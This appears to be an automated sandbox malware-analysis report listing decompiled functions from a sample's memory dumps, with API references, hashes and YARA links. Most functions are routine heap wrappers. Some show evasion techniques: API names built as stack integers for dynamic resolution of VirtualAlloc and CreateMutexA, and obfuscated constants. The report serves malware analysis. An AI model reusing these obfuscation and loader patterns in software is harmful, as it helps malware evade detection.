Memory Dump Source

Source File: 00000004.00000002.361065013.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.361057801.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.361113607.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction ID: dec05fa3737df580d58ff145636bc0451a72c06ba1d5dcadd23311741e886f9d
Opcode Fuzzy Hash: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction Fuzzy Hash: B91128B5E00208EBDB44DFE5D94AADEBBF1FB44308F208089E515A7240D7B45B18CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6F3201B7, Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E6F3201B7(void* __ecx, signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x6f35e7c8, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E6F322E3C();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E6F3201A4(__eflags))) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E6F322A43(_t15, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(__eflags == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

APIs

RtlAllocateHeap.NTDLL(00000008,0000BC00,00000000,?,6F3211DC,00000001,00000364,00000006,000000FF,?,6F31C421,0000BC00,6F35E844,00000000), ref: 6F3201F8

Memory Dump Source

Source File: 00000004.00000002.361131631.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000004.00000002.361119870.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361126335.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.361183858.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361222651.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361232225.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.361265067.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361277337.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: bc560ab62cde5dd81d58804bf3dac7bb376fa2dc39494ef09e6efdf302a32ad2
Instruction ID: eddc385f60d2c3612d23003008b8936f9c5d65721be737e24c137f43586089e5
Opcode Fuzzy Hash: bc560ab62cde5dd81d58804bf3dac7bb376fa2dc39494ef09e6efdf302a32ad2
Instruction Fuzzy Hash: BEF0B4B554472467FB114A26CD10B8F3BDD9F82770F00A117AC28AA180CB31F50886E0

Uniqueness

Uniqueness Score: -1.00%

Function 6F31FEB1, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E6F31FEB1(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E6F3201A4(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x6f35e7c8, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E6F322E3C();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E6F322A43(_t7, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(__eflags == 0) {
						goto L7;
					}
				}
				return _t4;
			}

APIs

RtlAllocateHeap.NTDLL(00000000,6F35E844,6F35E824,?,6F31C421,0000BC00,6F35E844,00000000), ref: 6F31FEE3

Memory Dump Source

Source File: 00000004.00000002.361131631.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000004.00000002.361119870.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361126335.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.361183858.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361222651.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361232225.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.361265067.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361277337.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 7fa555aadc6c4c6973dacded05396da63d9d4cddd5499b8640794b978325bcef
Instruction ID: b7b1b8910a81d0bd56b3e64b17b44260ba1a498cf66a7dcfbb49416a3aa6feb1
Opcode Fuzzy Hash: 7fa555aadc6c4c6973dacded05396da63d9d4cddd5499b8640794b978325bcef
Instruction Fuzzy Hash: 65E0ED3110876067FB14DA79DD00B9B7A8C9FC2BB4F100126EC58AA6C3DB21E96181B0

Uniqueness

Uniqueness Score: -1.00%

Function 6F31E93F, Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F31E93F(intOrPtr _a4) {
				intOrPtr _v8;
				void* _t5;

				_v8 = 0;
				_t5 = E6F31FEFF(_a4); // executed
				return _t5;
			}

0x6f31e948
0x6f31e952
0x6f31e95b

APIs

_free.LIBCMT ref: 6F31E952

Part of subcall function 6F31FEFF: RtlFreeHeap.NTDLL(00000000,00000000,?,6F324799,?,00000000,?,00000000,?,6F3247C0,?,00000007,?,?,6F324436,?), ref: 6F31FF15
Part of subcall function 6F31FEFF: GetLastError.KERNEL32(?,?,6F324799,?,00000000,?,00000000,?,6F3247C0,?,00000007,?,?,6F324436,?,?), ref: 6F31FF27

Memory Dump Source

Source File: 00000004.00000002.361131631.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000004.00000002.361119870.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361126335.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.361183858.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361222651.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361232225.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.361265067.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361277337.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: 25859c18ab612c5f0631ce58c7b6183bdee4517b4cbaaa23e1fa741b9d1b91b5
Instruction ID: 6153cf0a655f26958e1333084741c97d416f1ac39eea12104ef1762fc49f2f68
Opcode Fuzzy Hash: 25859c18ab612c5f0631ce58c7b6183bdee4517b4cbaaa23e1fa741b9d1b91b5
Instruction Fuzzy Hash: 65C08C3140820CBBCB04CF89E806A5FBBA8DBC0364F200288FC0C07340DF72AE1096D0

Uniqueness

Uniqueness Score: -1.00%

Function 100117CB, Relevance: 1.3, APIs: 1, Instructions: 56
stringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E100117CB(WCHAR* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t44;
				int _t55;
				signed int _t57;
				WCHAR* _t62;

				_push(_a8);
				_t62 = __ecx;
				_push(_a4);
				_push(__ecx);
				E10022523(_t44);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x2c5dd9;
				_v28 = 0x29a411;
				_v16 = 0xb6013c;
				_v16 = _v16 >> 2;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x05bceb0d;
				_v12 = 0xa7496a;
				_t57 = 7;
				_v12 = _v12 * 0x55;
				_v12 = _v12 | 0x1a205192;
				_v12 = _v12 ^ 0x3fab9f8f;
				_v8 = 0xf5055a;
				_v8 = _v8 / _t57;
				_v8 = _v8 + 0xa16;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 ^ 0x1132ba81;
				_v20 = 0xaea409;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x2ba3ef66;
				E10002309(0xb8, _t57, _t57, 0xbf157248, _t57, 0x9c9047d0);
				_t55 = lstrcmpiW(_t62, _a8); // executed
				return _t55;
			}

0x100117d2
0x100117d5
0x100117d7
0x100117db
0x100117dc
0x100117e1
0x100117e8
0x100117f1
0x100117f8
0x100117ff
0x10011803
0x10011807
0x1001180e
0x1001181b
0x10011822
0x10011825
0x1001182c
0x10011833
0x10011844
0x10011847
0x10011859
0x1001185c
0x10011863
0x1001186a
0x1001186e
0x10011881
0x1001188d
0x10011893

APIs

lstrcmpiW.KERNELBASE(?,05BCEB0D,?,?,?,?,?,?,?,?,00000000), ref: 1001188D

Memory Dump Source

Source File: 00000004.00000002.361065013.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.361057801.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.361113607.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction ID: 1774797ce17004cd69ed458787da8d3b2b53829bebfee28bf73c73f1d8c62a15
Opcode Fuzzy Hash: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction Fuzzy Hash: 652127B5D0020CFFDB04DFA4D94A9EEBBB4EB44304F108189E425B7240E3B56B049F91

Uniqueness

Uniqueness Score: -1.00%

Function 6F31BA90, Relevance: 1.3, APIs: 1, Instructions: 9
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F31BA90(void* _a4, long _a8, long _a12, long _a16) {
				void* _t5;

				_t5 = VirtualAlloc(_a4, _a8, _a12, _a16); // executed
				return _t5;
			}

0x6f31ba9f
0x6f31baa6

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 6F31BA9F

Memory Dump Source

Source File: 00000004.00000002.361131631.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000004.00000002.361119870.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361126335.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.361183858.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361222651.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361232225.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.361265067.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361277337.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f43fef0e8e27081f86f50b4feb5455882ddaf1b30b21334fc4bae279c5eb83f5
Instruction ID: 6b0dc0905f55b158a5e4beb04903f512e175f8279ef845925761dd4b2e4b4212
Opcode Fuzzy Hash: f43fef0e8e27081f86f50b4feb5455882ddaf1b30b21334fc4bae279c5eb83f5
Instruction Fuzzy Hash: 77C0483200420DFBCF026F81EC0489A7F3AFB092A0B008019FA1844021CB339970ABA1

Uniqueness

Uniqueness Score: -1.00%

Function 6F31BAB0, Relevance: 1.3, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F31BAB0(void* _a4, long _a8, long _a12) {
				int _t4;

				_t4 = VirtualFree(_a4, _a8, _a12); // executed
				return _t4;
			}

0x6f31babc
0x6f31bac3

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 6F31BABC

Memory Dump Source

Source File: 00000004.00000002.361131631.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000004.00000002.361119870.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361126335.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.361183858.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361222651.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361232225.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.361265067.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361277337.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 071cd09311c0304ef4b00bad4b2fc613086bdde37d43f87acf9710bfad42e48b
Instruction ID: 73ea6bc53febc0297034526d42a337f0028933853475dc4ec699f78692b8f0b2
Opcode Fuzzy Hash: 071cd09311c0304ef4b00bad4b2fc613086bdde37d43f87acf9710bfad42e48b
Instruction Fuzzy Hash: ADB0923200420CFBCF022F81DC048D93F3EFB092B1B008059FA1C04020CB339570AB84

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6F32429D, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F32429D(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x6f346790) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E6F31FEFF(_t46);
							E6F324608( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E6F31FEFF(_t47);
							E6F324706( *((intOrPtr*)(_t74 + 0x88)));
						}
						E6F31FEFF( *((intOrPtr*)(_t74 + 0x7c)));
						E6F31FEFF( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E6F31FEFF( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E6F31FEFF( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E6F31FEFF( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E6F31FEFF( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E6F324410( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x6f346260) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E6F31FEFF(_t31);
							E6F31FEFF( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E6F31FEFF(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E6F31FEFF(_t74);
			}

APIs

___free_lconv_mon.LIBCMT ref: 6F3242E1

Part of subcall function 6F324608: _free.LIBCMT ref: 6F324625
Part of subcall function 6F324608: _free.LIBCMT ref: 6F324637
Part of subcall function 6F324608: _free.LIBCMT ref: 6F324649
Part of subcall function 6F324608: _free.LIBCMT ref: 6F32465B
Part of subcall function 6F324608: _free.LIBCMT ref: 6F32466D
Part of subcall function 6F324608: _free.LIBCMT ref: 6F32467F
Part of subcall function 6F324608: _free.LIBCMT ref: 6F324691
Part of subcall function 6F324608: _free.LIBCMT ref: 6F3246A3
Part of subcall function 6F324608: _free.LIBCMT ref: 6F3246B5
Part of subcall function 6F324608: _free.LIBCMT ref: 6F3246C7
Part of subcall function 6F324608: _free.LIBCMT ref: 6F3246D9
Part of subcall function 6F324608: _free.LIBCMT ref: 6F3246EB
Part of subcall function 6F324608: _free.LIBCMT ref: 6F3246FD

_free.LIBCMT ref: 6F3242D6

Part of subcall function 6F31FEFF: RtlFreeHeap.NTDLL(00000000,00000000,?,6F324799,?,00000000,?,00000000,?,6F3247C0,?,00000007,?,?,6F324436,?), ref: 6F31FF15
Part of subcall function 6F31FEFF: GetLastError.KERNEL32(?,?,6F324799,?,00000000,?,00000000,?,6F3247C0,?,00000007,?,?,6F324436,?,?), ref: 6F31FF27

_free.LIBCMT ref: 6F3242F8
_free.LIBCMT ref: 6F32430D
_free.LIBCMT ref: 6F324318
_free.LIBCMT ref: 6F32433A
_free.LIBCMT ref: 6F32434D
_free.LIBCMT ref: 6F32435B
_free.LIBCMT ref: 6F324366
_free.LIBCMT ref: 6F32439E
_free.LIBCMT ref: 6F3243A5
_free.LIBCMT ref: 6F3243C2
_free.LIBCMT ref: 6F3243DA

Strings

`b4o, xrefs: 6F324389

Memory Dump Source

Source File: 00000004.00000002.361131631.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000004.00000002.361119870.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361126335.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.361183858.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361222651.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361232225.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.361265067.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361277337.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: `b4o
API String ID: 161543041-924235887
Opcode ID: 7598c8670d79b068b15dabf37672a7ad4298f27cabb9073782117964bf221692
Instruction ID: 4abb448977194ee9e0d7da2c0094a99a8c0885b60f93c74de0275241441dfc60
Opcode Fuzzy Hash: 7598c8670d79b068b15dabf37672a7ad4298f27cabb9073782117964bf221692
Instruction Fuzzy Hash: 52316031608345DFEB149A39D880B8BB3E9BF80354F20461AE599DB692DF32F851CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6F301305, Relevance: 22.8, APIs: 5, Strings: 8, Instructions: 56
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F301305() {
				char _v5;
				intOrPtr _v9;
				intOrPtr _v13;
				char _v17;
				char _v18;
				intOrPtr _v22;
				intOrPtr _v26;
				char _v30;
				char _v31;
				char _v32;
				short _v34;
				intOrPtr _v38;
				char _v42;
				char _v43;
				intOrPtr _v47;
				intOrPtr _v51;
				char _v55;
				char _v56;
				intOrPtr _v60;
				char _v64;
				struct HINSTANCE__* _t26;
				struct HINSTANCE__* _t28;
				struct HINSTANCE__* _t30;
				struct HINSTANCE__* _t32;
				_Unknown_base(*)()* _t33;

				_v64 = 0x6e72656b;
				_v60 = 0x32336c65;
				_v56 = 0;
				_v55 = 0x74726956;
				_v51 = 0x416c6175;
				_v47 = 0x636f6c6c;
				_v43 = 0;
				_v42 = 0x74726956;
				_v38 = 0x466c6175;
				_v34 = 0x6572;
				_v32 = 0x65;
				_v31 = 0;
				_v30 = 0x61657243;
				_v26 = 0x754d6574;
				_v22 = 0x41786574;
				_v18 = 0;
				_v17 = 0x4c746547;
				_v13 = 0x45747361;
				_v9 = 0x726f7272;
				_v5 = 0;
				_t21 =  &_v64; // 0x6e72656b
				_t26 = GetModuleHandleA(_t21);
				if(_t26 != 0) {
					_t22 =  &_v55; // 0x74726956
					 *0x6f346064 = GetProcAddress(_t26, _t22);
					_t28 = _t26;
					_t23 =  &_v42; // 0x74726956
					 *0x6f346068 = GetProcAddress(_t28, _t23);
					_t30 = _t28;
					_t24 =  &_v30; // 0x61657243
					 *0x6f34606c = GetProcAddress(_t30, _t24);
					_t32 = _t30;
					_t33 = GetProcAddress(_t32,  &_v17);
					"@Mxt7ce3e80173264ea19b05306b865eadf9" = _t33;
					return _t33;
				}
				return _t26;
			}

APIs

GetModuleHandleA.KERNEL32(kernel32), ref: 6F301388
GetProcAddress.KERNEL32(00000000,VirtualAlloc), ref: 6F301398
GetProcAddress.KERNEL32(6E72656B,VirtualFreCreateMutexA), ref: 6F3013AA
GetProcAddress.KERNEL32(32336C65,CreateMutexA), ref: 6F3013BC
GetProcAddress.KERNEL32(00000000,4C746547), ref: 6F3013CD

Strings

VirtualAlloc, xrefs: 6F301393, 6F301396
rror, xrefs: 6F301379
@Mxt7ce3e80173264ea19b05306b865eadf9, xrefs: 6F3013D3
astE, xrefs: 6F301372
VirtualFreCreateMutexA, xrefs: 6F3013A5, 6F3013A8
kernel32, xrefs: 6F301384, 6F301387
GetL, xrefs: 6F30136B
texA, xrefs: 6F301360

Memory Dump Source

Source File: 00000004.00000002.361126335.000000006F301000.00000080.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000004.00000002.361119870.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361131631.000000006F302000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.361183858.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361222651.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361232225.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.361265067.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361277337.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleModule
String ID: @Mxt7ce3e80173264ea19b05306b865eadf9$GetL$VirtualAlloc$VirtualFreCreateMutexA$astE$kernel32$rror$texA
API String ID: 667068680-3237107477
Opcode ID: 24d3dd1265604e6a0067d9b8875a349feb9556da17829d37b22fc0a8d67f6c31
Instruction ID: e9682cdfe1eb16420ce58e19bcd16581c40f7fd5f245901ed2bdafba14830f05
Opcode Fuzzy Hash: 24d3dd1265604e6a0067d9b8875a349feb9556da17829d37b22fc0a8d67f6c31
Instruction Fuzzy Hash: 8D2115B1C08748AEEF01DFE4D548BEEBB79EB46710F10854EE441AA258DB758214CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 6F320EF4, Relevance: 15.1, APIs: 10, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6F320EF4(void* __edx, void* __esi, char _a4) {
				char _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				intOrPtr _t67;
				void* _t71;
				void* _t72;

				_t72 = __esi;
				_t71 = __edx;
				_t36 = _a4;
				_t67 =  *_a4;
				_t76 = _t67 - 0x6f328a38;
				if(_t67 != 0x6f328a38) {
					E6F31FEFF(_t67);
					_t36 = _a4;
				}
				E6F31FEFF( *((intOrPtr*)(_t36 + 0x3c)));
				E6F31FEFF( *((intOrPtr*)(_a4 + 0x30)));
				E6F31FEFF( *((intOrPtr*)(_a4 + 0x34)));
				E6F31FEFF( *((intOrPtr*)(_a4 + 0x38)));
				E6F31FEFF( *((intOrPtr*)(_a4 + 0x28)));
				E6F31FEFF( *((intOrPtr*)(_a4 + 0x2c)));
				E6F31FEFF( *((intOrPtr*)(_a4 + 0x40)));
				E6F31FEFF( *((intOrPtr*)(_a4 + 0x44)));
				E6F31FEFF( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E6F320D3C( &_v5, _t71, _t76);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E6F320D9D( &_v5, _t71, _t72, _t76);
			}

APIs

_free.LIBCMT ref: 6F320F0A

Part of subcall function 6F31FEFF: RtlFreeHeap.NTDLL(00000000,00000000,?,6F324799,?,00000000,?,00000000,?,6F3247C0,?,00000007,?,?,6F324436,?), ref: 6F31FF15
Part of subcall function 6F31FEFF: GetLastError.KERNEL32(?,?,6F324799,?,00000000,?,00000000,?,6F3247C0,?,00000007,?,?,6F324436,?,?), ref: 6F31FF27

_free.LIBCMT ref: 6F320F16
_free.LIBCMT ref: 6F320F21
_free.LIBCMT ref: 6F320F2C
_free.LIBCMT ref: 6F320F37
_free.LIBCMT ref: 6F320F42
_free.LIBCMT ref: 6F320F4D
_free.LIBCMT ref: 6F320F58
_free.LIBCMT ref: 6F320F63
_free.LIBCMT ref: 6F320F71

Memory Dump Source

Source File: 00000004.00000002.361131631.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000004.00000002.361119870.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361126335.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.361183858.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.361222651.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361232225.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.361265067.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.361277337.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 05f1869d5bd6065b127848433a61e8077548da0791c310eefbf74283c36fa016
Instruction ID: 24afe4d7194f1c82a9512393139de7b4ce4904a105c3e898f44f498db7adec12
Opcode Fuzzy Hash: 05f1869d5bd6065b127848433a61e8077548da0791c310eefbf74283c36fa016
Instruction Fuzzy Hash: 7321EB76904248BFCB05EFA8C880DDE7BB9FF48340F1042A6F5559B661DB31EA45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6F31D3D0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E6F31D3D0(void* __ebx, void* __edi, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v40;
				char _t51;
				signed int _t58;
				intOrPtr _t59;
				void* _t60;
				intOrPtr* _t61;
				intOrPtr _t63;
				intOrPtr* _t64;
				intOrPtr* _t67;
				intOrPtr _t71;
				intOrPtr _t73;
				signed int _t75;
				char _t77;
				intOrPtr _t90;
				intOrPtr _t93;
				intOrPtr* _t95;
				intOrPtr* _t97;
				void* _t98;
				void* _t101;
				void* _t102;
				void* _t110;

				_t71 = _a8;
				_v5 = 0;
				_t93 = _t71 + 0x10;
				_push(_t93);
				_v16 = 1;
				_v20 = _t93;
				_v12 =  *(_t71 + 8) ^  *0x6f34609c;
				E6F31D390( *(_t71 + 8) ^  *0x6f34609c);
				E6F31D717(_a12);
				_t51 = _a4;
				_t102 = _t101 + 0xc;
				_t90 =  *((intOrPtr*)(_t71 + 0xc));
				if(( *(_t51 + 4) & 0x00000066) != 0) {
					__eflags = _t90 - 0xfffffffe;
					if(_t90 != 0xfffffffe) {
						E6F31D700(_t71, 0xfffffffe, _t93, 0x6f34609c);
						goto L14;
					}
					goto L15;
				} else {
					_v32 = _t51;
					_v28 = _a12;
					 *((intOrPtr*)(_t71 - 4)) =  &_v32;
					if(_t90 == 0xfffffffe) {
						L15:
						return _v16;
					} else {
						do {
							_t75 = _v12;
							_t20 = _t90 + 2; // 0x3
							_t58 = _t90 + _t20 * 2;
							_t73 =  *((intOrPtr*)(_t75 + _t58 * 4));
							_t59 = _t75 + _t58 * 4;
							_t76 =  *((intOrPtr*)(_t59 + 4));
							_v24 = _t59;
							if( *((intOrPtr*)(_t59 + 4)) == 0) {
								_t77 = _v5;
								goto L8;
							} else {
								_t60 = E6F31D6B0(_t76, _t93);
								_t77 = 1;
								_v5 = 1;
								_t110 = _t60;
								if(_t110 < 0) {
									_v16 = 0;
									L14:
									_push(_t93);
									E6F31D390(_v12);
									goto L15;
								} else {
									if(_t110 > 0) {
										_t61 = _a4;
										__eflags =  *_t61 - 0xe06d7363;
										if( *_t61 == 0xe06d7363) {
											__eflags =  *0x6f328a30;
											if(__eflags != 0) {
												_t67 = E6F326B90(__eflags, 0x6f328a30);
												_t102 = _t102 + 4;
												__eflags = _t67;
												if(_t67 != 0) {
													_t97 =  *0x6f328a30; // 0x6f31e30c
													 *0x6f328124(_a4, 1);
													 *_t97();
													_t93 = _v20;
													_t102 = _t102 + 8;
												}
												_t61 = _a4;
											}
										}
										E6F31D6E4(_t61, _a8, _t61);
										_t63 = _a8;
										__eflags =  *((intOrPtr*)(_t63 + 0xc)) - _t90;
										if( *((intOrPtr*)(_t63 + 0xc)) != _t90) {
											E6F31D700(_t63, _t90, _t93, 0x6f34609c);
											_t63 = _a8;
										}
										 *((intOrPtr*)(_t63 + 0xc)) = _t73;
										_t64 = E6F31D390(_v12);
										E6F31D6C8();
